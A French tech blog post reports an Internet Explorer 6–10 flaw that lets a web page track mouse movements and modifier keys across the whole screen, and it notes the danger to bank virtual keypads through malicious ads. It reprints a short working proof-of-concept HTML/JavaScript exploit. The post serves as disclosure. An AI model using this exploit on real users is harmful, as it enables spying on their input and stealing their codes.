Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Une faille pour suivre les mouvements de souris des Internautes dans Internet Explorer

Holy shit ! Une faille de sécurité dans Internet Explorer présente dans les versions 6 à 10 permet à un attaquant de suivre et d’enregistrer tous les mouvements de votre souris, et cela sur tout l’écran, même si IE est réduit dans la barre des tâches ou inactif ! Pire, les touches comme CTRL, SHIFT ou ALT sont aussi interceptables.

Cette faille présente un intérêt certain pour qui souhaite récupérer les codes entrés sur les claviers virtuels. On retrouve la plupart de ces « claviers » sur les sites des banques par exemple et le pirate pourrait simplement en achetant un emplacement pour de la pub sur un site même très grand public, piéger celle-ci et intercepter les mouvements de souris des internautes. Ça semble d’ailleurs être déjà entré en production sur certains serveurs de ad exchange (serveurs de bannières).
Voici une démo en vidéo pour que vous voyiez ce que ça donne…

Et l’exploit est on ne peut plus simple à implémenter…

Exploit
-----------------
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>

Si cela vous intéresse, sachez qu’il y a une démo testable pour IE sur ce site et même un jeu pour vous entrainer au chti pérate…

Merci à Paul pour le partage


Les articles du moment